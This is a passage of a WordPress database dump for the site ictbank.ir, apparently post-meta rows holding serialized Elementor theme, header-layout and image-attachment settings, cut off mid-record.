(727,358,'_elementor_controls_usage','a:3:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:10:\"text_color\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}}'),
(728,345,'_edit_lock','1758385846:1'),
(729,362,'_elementor_edit_mode','builder'),
(730,362,'_elementor_template_type','kit'),
(731,362,'_elementor_version','3.2.3'),
(733,345,'_wp_page_template','default'),
(734,345,'_elementor_page_settings','a:21:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#191919\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#750E21\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#BED754\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#E3651D\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:11:\"Roboto Slab\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:10:\"ictbank.ir\";s:26:\"body_background_background\";s:7:\"classic\";s:25:\"mobile_browser_background\";s:7:\"#FF0000\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:15:\"activeItemIndex\";i:1;s:9:\"site_logo\";a:5:{s:3:\"url\";s:58:\"http://ictbank.ir/blog/wp-content/uploads/2021/05/logo.png\";s:2:\"id\";i:786;s:4:\"size\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:6:\"source\";s:7:\"library\";}s:36:\"typography_enable_styleguide_preview\";s:3:\"yes\";s:32:\"colors_enable_styleguide_preview\";s:3:\"yes\";s:11:\"__globals__\";a:1:{s:21:\"body_background_color\";s:25:\"globals/colors?id=primary\";}s:12:\"site_favicon\";a:5:{s:3:\"url\";s:58:\"http://ictbank.ir/blog/wp-content/uploads/2021/05/logo.png\";s:2:\"id\";i:786;s:4:\"size\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:6:\"source\";s:7:\"library\";}s:25:\"hello_header_logo_display\";s:0:\"\";s:28:\"hello_header_tagline_display\";s:0:\"\";s:25:\"hello_header_menu_display\";s:0:\"\";}'),
(735,345,'_elementor_data','[]'),
(736,363,'_elementor_edit_mode','builder'),
(737,363,'_elementor_template_type','kit'),
(738,363,'_elementor_version','3.2.3'),
(740,363,'_wp_page_template','default'),
(741,363,'_elementor_page_settings','a:12:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#6EC1E4\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#54595F\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#7A7A7A\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#61CE70\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:11:\"Roboto Slab\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:10:\"ictbank.ir\";s:26:\"body_background_background\";s:7:\"classic\";s:21:\"body_background_color\";s:7:\"#000000\";s:25:\"mobile_browser_background\";s:7:\"#FF0000\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;}'),
(742,363,'_elementor_data','[]'),
(917,386,'_elementor_template_type','header'),
(918,386,'_elementor_edit_mode','builder'),
(919,386,'_elementor_data','a:1:{i:0;a:5:{s:2:\"id\";s:7:\"a0812b0\";s:6:\"elType\";s:7:\"section\";s:8:\"settings\";a:5:{s:13:\"content_width\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:1670;s:5:\"sizes\";a:0:{}}s:3:\"gap\";s:2:\"no\";s:21:\"background_background\";s:7:\"classic\";s:6:\"margin\";a:6:{s:4:\"unit\";s:2:\"px\";s:3:\"top\";i:65;s:5:\"right\";i:0;s:6:\"bottom\";i:0;s:4:\"left\";i:0;s:8:\"isLinked\";b:0;}s:7:\"padding\";a:6:{s:4:\"unit\";s:2:\"px\";s:3:\"top\";i:0;s:5:\"right\";i:35;s:6:\"bottom\";i:0;s:4:\"left\";i:35;s:8:\"isLinked\";b:0;}}s:8:\"elements\";a:1:{i:0;a:5:{s:2:\"id\";s:7:\"d7a5be6\";s:6:\"elType\";s:6:\"column\";s:8:\"settings\";a:2:{s:12:\"_column_size\";i:100;s:12:\"_inline_size\";N;}s:8:\"elements\";a:1:{i:0;a:5:{s:2:\"id\";s:7:\"ea3cb53\";s:6:\"elType\";s:7:\"section\";s:8:\"settings\";a:9:{s:3:\"gap\";s:2:\"no\";s:16:\"content_position\";s:6:\"middle\";s:9:\"structure\";i:30;s:21:\"background_background\";s:7:\"classic\";s:16:\"background_color\";s:7:\"#FFFFFF\";s:26:\"box_shadow_box_shadow_type\";s:3:\"yes\";s:21:\"box_shadow_box_shadow\";a:5:{s:10:\"horizontal\";i:0;s:8:\"vertical\";i:3;s:4:\"blur\";i:45;s:6:\"spread\";i:0;s:5:\"color\";s:19:\"rgba(0, 0, 0, 0.16)\";}s:7:\"padding\";a:6:{s:4:\"unit\";s:2:\"px\";s:3:\"top\";i:6;s:5:\"right\";i:35;s:6:\"bottom\";i:6;s:4:\"left\";i:35;s:8:\"isLinked\";b:0;}s:10:\"custom_css\";s:63:\"selector .elementor-row {\n justify-content: space-between;\n}\";}s:8:\"elements\";a:3:{i:0;a:5:{s:2:\"id\";s:7:\"6051c1d\";s:6:\"elType\";s:6:\"column\";s:8:\"settings\";a:4:{s:12:\"_column_size\";i:33;s:12:\"_inline_size\";N;s:16:\"content_position\";s:6:\"center\";s:10:\"custom_css\";s:31:\"selector {\n width: auto ;\n} \";}s:8:\"elements\";a:1:{i:0;a:5:{s:2:\"id\";s:7:\"99364c3\";s:6:\"elType\";s:6:\"widget\";s:8:\"settings\";a:1:{s:14:\"_element_width\";s:4:\"auto\";}s:8:\"elements\";a:0:{}s:10:\"widgetType\";s:8:\"aux_logo\";}}s:7:\"isInner\";b:1;}i:1;a:5:{s:2:\"id\";s:7:\"67028c1\";s:6:\"elType\";s:6:\"column\";s:8:\"settings\";a:4:{s:12:\"_column_size\";i:33;s:12:\"_inline_size\";N;s:16:\"content_position\";s:6:\"center\";s:10:\"custom_css\";s:31:\"selector {\n width: auto ;\n} \";}s:8:\"elements\";a:1:{i:0;a:5:{s:2:\"id\";s:7:\"b23aa53\";s:6:\"elType\";s:6:\"widget\";s:8:\"settings\";a:14:{s:9:\"menu_slug\";s:11:\"header-menu\";s:8:\"splitter\";s:0:\"\";s:9:\"indicator\";s:0:\"\";s:14:\"display_burger\";s:6:\"custom\";s:10:\"breakpoint\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:767;s:5:\"sizes\";a:0:{}}s:10:\"item_color\";s:7:\"#101010\";s:25:\"menu_item_typo_typography\";s:6:\"custom\";s:26:\"menu_item_typo_font_family\";s:6:\"Nunito\";s:24:\"menu_item_typo_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:26:\"menu_item_typo_font_weight\";i:600;s:29:\"menu_item_typo_text_transform\";s:10:\"capitalize\";s:26:\"menu_item_typo_line_height\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:22;s:5:\"sizes\";a:0:{}}s:16:\"item_hover_color\";s:7:\"#0079FC\";s:20:\"burger_menu_location\";s:7:\"overlay\";}s:8:\"elements\";a:0:{}s:10:\"widgetType\";s:12:\"aux_menu_box\";}}s:7:\"isInner\";b:1;}i:2;a:5:{s:2:\"id\";s:7:\"b2b08e8\";s:6:\"elType\";s:6:\"column\";s:8:\"settings\";a:6:{s:12:\"_column_size\";i:33;s:12:\"_inline_size\";N;s:16:\"content_position\";s:6:\"center\";s:11:\"hide_tablet\";s:13:\"hidden-tablet\";s:10:\"custom_css\";s:31:\"selector {\n width: auto ;\n} \";s:11:\"hide_mobile\";s:12:\"hidden-phone\";}s:8:\"elements\";a:2:{i:0;a:5:{s:2:\"id\";s:7:\"01b95c4\";s:6:\"elType\";s:6:\"widget\";s:8:\"settings\";a:7:{s:4:\"icon\";s:16:\"auxicon-search-2\";s:7:\"is_ajax\";s:0:\"\";s:9:\"icon_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:18;s:5:\"sizes\";a:0:{}}s:10:\"icon_color\";s:7:\"#0079FC\";s:11:\"icon_margin\";a:6:{s:4:\"unit\";s:2:\"px\";s:3:\"top\";i:0;s:5:\"right\";i:0;s:6:\"bottom\";i:0;s:4:\"left\";i:0;s:8:\"isLinked\";b:0;}s:7:\"_margin\";a:6:{s:4:\"unit\";s:2:\"px\";s:3:\"top\";i:0;s:5:\"right\";i:45;s:6:\"bottom\";i:0;s:4:\"left\";i:0;s:8:\"isLinked\";b:0;}s:14:\"_element_width\";s:4:\"auto\";}s:8:\"elements\";a:0:{}s:10:\"widgetType\";s:14:\"aux_search_box\";}i:1;a:5:{s:2:\"id\";s:7:\"6ddeb30\";s:6:\"elType\";s:6:\"widget\";s:8:\"settings\";a:9:{s:16:\"social_icon_list\";a:4:{i:0;a:6:{s:11:\"social_icon\";a:2:{s:5:\"value\";s:22:\"fab fa-facebook-square\";s:7:\"library\";s:9:\"fa-brands\";}s:3:\"_id\";s:7:\"81fb7c9\";s:4:\"link\";a:4:{s:3:\"url\";s:0:\"\";s:11:\"is_external\";s:4:\"true\";s:8:\"nofollow\";s:0:\"\";s:17:\"custom_attributes\";s:0:\"\";}s:15:\"item_icon_color\";s:7:\"default\";s:23:\"item_icon_primary_color\";s:0:\"\";s:25:\"item_icon_secondary_color\";s:0:\"\";}i:1;a:6:{s:11:\"social_icon\";a:2:{s:5:\"value\";s:16:\"fab fa-pinterest\";s:7:\"library\";s:9:\"fa-brands\";}s:4:\"link\";a:4:{s:3:\"url\";s:0:\"\";s:11:\"is_external\";s:4:\"true\";s:8:\"nofollow\";s:0:\"\";s:17:\"custom_attributes\";s:0:\"\";}s:15:\"item_icon_color\";s:7:\"default\";s:23:\"item_icon_primary_color\";s:0:\"\";s:25:\"item_icon_secondary_color\";s:0:\"\";s:3:\"_id\";s:7:\"492b914\";}i:2;a:6:{s:11:\"social_icon\";a:2:{s:5:\"value\";s:14:\"fab fa-twitter\";s:7:\"library\";s:9:\"fa-brands\";}s:4:\"link\";a:4:{s:3:\"url\";s:0:\"\";s:11:\"is_external\";s:4:\"true\";s:8:\"nofollow\";s:0:\"\";s:17:\"custom_attributes\";s:0:\"\";}s:15:\"item_icon_color\";s:7:\"default\";s:23:\"item_icon_primary_color\";s:0:\"\";s:25:\"item_icon_secondary_color\";s:0:\"\";s:3:\"_id\";s:7:\"1fb68b9\";}i:3;a:6:{s:11:\"social_icon\";a:2:{s:5:\"value\";s:14:\"fab fa-youtube\";s:7:\"library\";s:9:\"fa-brands\";}s:4:\"link\";a:4:{s:3:\"url\";s:0:\"\";s:11:\"is_external\";s:4:\"true\";s:8:\"nofollow\";s:0:\"\";s:17:\"custom_attributes\";s:0:\"\";}s:15:\"item_icon_color\";s:7:\"default\";s:23:\"item_icon_primary_color\";s:0:\"\";s:25:\"item_icon_secondary_color\";s:0:\"\";s:3:\"_id\";s:7:\"f7e5b3d\";}}s:5:\"shape\";s:6:\"square\";s:10:\"icon_color\";s:6:\"custom\";s:18:\"icon_primary_color\";s:16:\"rgba(2, 1, 1, 0)\";s:20:\"icon_secondary_color\";s:7:\"#0C0C0C\";s:9:\"icon_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:18;s:5:\"sizes\";a:0:{}}s:12:\"icon_padding\";a:3:{s:4:\"unit\";s:2:\"em\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:12:\"icon_spacing\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:10;s:5:\"sizes\";a:0:{}}s:14:\"_element_width\";s:4:\"auto\";}s:8:\"elements\";a:0:{}s:10:\"widgetType\";s:12:\"social-icons\";}}s:7:\"isInner\";b:1;}}s:7:\"isInner\";b:1;}}s:7:\"isInner\";b:0;}}s:7:\"isInner\";b:0;}}'),
(920,386,'_elementor_version','3.2.3'),
(921,386,'_wp_page_template','default'),
(923,387,'_elementor_template_type','header'),
(924,387,'_elementor_edit_mode','builder'),
(925,387,'_elementor_data','a:1:{i:0;a:5:{s:2:\"id\";s:7:\"8a389f7\";s:6:\"elType\";s:7:\"section\";s:8:\"settings\";a:5:{s:3:\"gap\";s:2:\"no\";s:16:\"content_position\";s:6:\"middle\";s:9:\"structure\";i:30;s:21:\"background_background\";s:7:\"classic\";s:7:\"padding\";a:6:{s:4:\"unit\";s:2:\"px\";s:3:\"top\";i:0;s:5:\"right\";i:35;s:6:\"bottom\";i:0;s:4:\"left\";i:35;s:8:\"isLinked\";b:0;}}s:8:\"elements\";a:3:{i:0;a:5:{s:2:\"id\";s:7:\"622828a\";s:6:\"elType\";s:6:\"column\";s:8:\"settings\";a:4:{s:12:\"_column_size\";i:33;s:12:\"_inline_size\";i:40;s:19:\"_inline_size_mobile\";i:5;s:5:\"align\";s:8:\"flex-end\";}s:8:\"elements\";a:1:{i:0;a:5:{s:2:\"id\";s:7:\"4d6c37d\";s:6:\"elType\";s:6:\"widget\";s:8:\"settings\";a:24:{s:9:\"menu_slug\";s:11:\"header-menu\";s:20:\"burger_menu_location\";s:7:\"overlay\";s:5:\"align\";s:6:\"center\";s:10:\"item_color\";s:7:\"#FFFFFF\";s:25:\"menu_item_typo_typography\";s:6:\"custom\";s:26:\"menu_item_typo_font_family\";s:10:\"Montserrat\";s:24:\"menu_item_typo_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:31:\"menu_item_typo_font_size_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:12;s:5:\"sizes\";a:0:{}}s:26:\"menu_item_typo_font_weight\";i:600;s:29:\"menu_item_typo_text_transform\";s:10:\"capitalize\";s:26:\"menu_item_typo_line_height\";a:3:{s:4:\"unit\";s:2:\"em\";s:4:\"size\";d:1.2;s:5:\"sizes\";a:0:{}}s:16:\"burger_btn_color\";s:7:\"#FFFFFF\";s:16:\"burger_btn_style\";s:17:\"aux-regular-small\";s:18:\"fullscr_item_color\";s:7:\"#000000\";s:33:\"fullscr_menu_item_typo_typography\";s:6:\"custom\";s:39:\"fullscr_menu_item_typo_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:30;s:5:\"sizes\";a:0:{}}s:34:\"fullscr_menu_item_typo_font_weight\";i:500;s:21:\"_element_width_mobile\";s:4:\"auto\";s:10:\"custom_css\";s:74:\"selector .aux-item-content::after{\n background-color: #fff!important;\n}\";s:14:\"display_burger\";s:6:\"custom\";s:10:\"breakpoint\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:767;s:5:\"sizes\";a:0:{}}s:16:\"item_hover_color\";s:7:\"#C29E75\";s:12:\"item_padding\";a:6:{s:4:\"unit\";s:2:\"px\";s:3:\"top\";i:0;s:5:\"right\";i:20;s:6:\"bottom\";i:0;s:4:\"left\";i:20;s:8:\"isLinked\";b:0;}s:14:\"_element_width\";s:4:\"auto\";}s:8:\"elements\";a:0:{}s:10:\"widgetType\";s:12:\"aux_menu_box\";}}s:7:\"isInner\";b:0;}i:1;a:5:{s:2:\"id\";s:7:\"ff0c502\";s:6:\"elType\";s:6:\"column\";s:8:\"settings\";a:4:{s:12:\"_column_size\";i:33;s:12:\"_inline_size\";d:19.322;s:19:\"_inline_size_mobile\";i:81;s:12:\"align_mobile\";s:6:\"center\";}s:8:\"elements\";a:1:{i:0;a:5:{s:2:\"id\";i:3688489;s:6:\"elType\";s:6:\"widget\";s:8:\"settings\";a:5:{s:5:\"align\";s:6:\"center\";s:12:\"align_mobile\";s:6:\"center\";s:21:\"_element_width_mobile\";s:7:\"inherit\";s:20:\"aux_max_width_mobile\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:76;s:5:\"sizes\";a:0:{}}s:14:\"_element_width\";s:7:\"inherit\";}s:8:\"elements\";a:0:{}s:10:\"widgetType\";s:8:\"aux_logo\";}}s:7:\"isInner\";b:0;}i:2;a:5:{s:2:\"id\";s:7:\"48a289a\";s:6:\"elType\";s:6:\"column\";s:8:\"settings\";a:4:{s:12:\"_column_size\";i:33;s:12:\"_inline_size\";i:40;s:19:\"_inline_size_mobile\";i:5;s:5:\"align\";s:10:\"flex-start\";}s:8:\"elements\";a:1:{i:0;a:5:{s:2:\"id\";s:7:\"af8a1fe\";s:6:\"elType\";s:6:\"widget\";s:8:\"settings\";a:23:{s:9:\"menu_slug\";s:11:\"header-menu\";s:20:\"burger_menu_location\";s:7:\"overlay\";s:5:\"align\";s:6:\"center\";s:10:\"item_color\";s:7:\"#FFFFFF\";s:25:\"menu_item_typo_typography\";s:6:\"custom\";s:26:\"menu_item_typo_font_family\";s:10:\"Montserrat\";s:24:\"menu_item_typo_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:31:\"menu_item_typo_font_size_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:12;s:5:\"sizes\";a:0:{}}s:26:\"menu_item_typo_font_weight\";i:600;s:29:\"menu_item_typo_text_transform\";s:10:\"capitalize\";s:26:\"menu_item_typo_line_height\";a:3:{s:4:\"unit\";s:2:\"em\";s:4:\"size\";d:1.2;s:5:\"sizes\";a:0:{}}s:16:\"burger_btn_color\";s:7:\"#FFFFFF\";s:16:\"burger_btn_style\";s:17:\"aux-regular-small\";s:18:\"fullscr_item_color\";s:7:\"#000000\";s:33:\"fullscr_menu_item_typo_typography\";s:6:\"custom\";s:39:\"fullscr_menu_item_typo_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:30;s:5:\"sizes\";a:0:{}}s:34:\"fullscr_menu_item_typo_font_weight\";i:500;s:21:\"_element_width_mobile\";s:4:\"auto\";s:10:\"custom_css\";s:74:\"selector .aux-item-content::after{\n background-color: #fff!important;\n}\";s:14:\"display_burger\";s:6:\"custom\";s:10:\"breakpoint\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:767;s:5:\"sizes\";a:0:{}}s:12:\"item_padding\";a:6:{s:4:\"unit\";s:2:\"px\";s:3:\"top\";i:0;s:5:\"right\";i:20;s:6:\"bottom\";i:0;s:4:\"left\";i:20;s:8:\"isLinked\";b:0;}s:14:\"_element_width\";s:4:\"auto\";}s:8:\"elements\";a:0:{}s:10:\"widgetType\";s:12:\"aux_menu_box\";}}s:7:\"isInner\";b:0;}}s:7:\"isInner\";b:0;}}'),
(926,387,'_elementor_version','3.2.3'),
(927,387,'_wp_page_template','default'),
(979,396,'_wp_attached_file','2020/02/cropped-ictbank-1-3-e1621546726104.png'),
(980,396,'_wp_attachment_context','custom-logo'),
(981,396,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:83;s:4:\"file\";s:46:\"2020/02/cropped-ictbank-1-3-e1621546726104.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"cropped-ictbank-1-3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"cropped-ictbank-1-3-1024x430.png\";s:5:\"width\";i:1024;s:6:\"height\";i:430;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"cropped-ictbank-1-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"cropped-ictbank-1-3-768x430.png\";s:5:\"width\";i:768;s:6:\"height\";i:430;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:31:\"cropped-ictbank-1-3-280x180.png\";s:5:\"width\";i:280;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"cropped-ictbank-1-3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"cropped-ictbank-1-3-600x248.png\";s:5:\"width\";i:600;s:6:\"height\";i:248;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"cropped-ictbank-1-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"cropped-ictbank-1-3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"cropped-ictbank-1-3-600x248.png\";s:5:\"width\";i:600;s:6:\"height\";i:248;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"cropped-ictbank-1-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(983,396,'_edit_lock','1621546584:2'),
(984,396,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1042;s:6:\"height\";i:430;s:4:\"file\";s:23:\"cropped-ictbank-1-3.png\";}}'),
(1002,401,'_menu_item_type','post_type'),
(1003,401,'_menu_item_menu_item_parent','0'),
(1004,401,'_menu_item_object_id','51'),
(1005,401,'_menu_item_object','page'),
(1006,401,'_menu_item_target',''),
(1007,401,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(1008,401,'_menu_item_xfn',''),
(1009,401,'_menu_item_url',''),
(1026,405,'_wp_attached_file','2021/05/1400-02-02-12.02.51.jpg'),
(1027,405,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:640;s:4:\"file\";s:31:\"2021/05/1400-02-02-12.02.51.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"1400-02-02-12.02.51-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"1400-02-02-12.02.51-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:31:\"1400-02-02-12.02.51-280x180.jpg\";s:5:\"width\";i:280;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"1400-02-02-12.02.51-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"1400-02-02-12.02.51-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"1400-02-02-12.02.51-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"1400-02-02-12.02.51-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"1400-02-02-12.02.51-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"1400-02-02-12.02.51-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1045,410,'_wp_attached_file','2021/05/Slide01.jpg'),
(1046,410,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:19:\"2021/05/Slide01.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Slide01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"Slide01-1024x720.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Slide01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Slide01-768x720.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"Slide01-280x180.jpg\";s: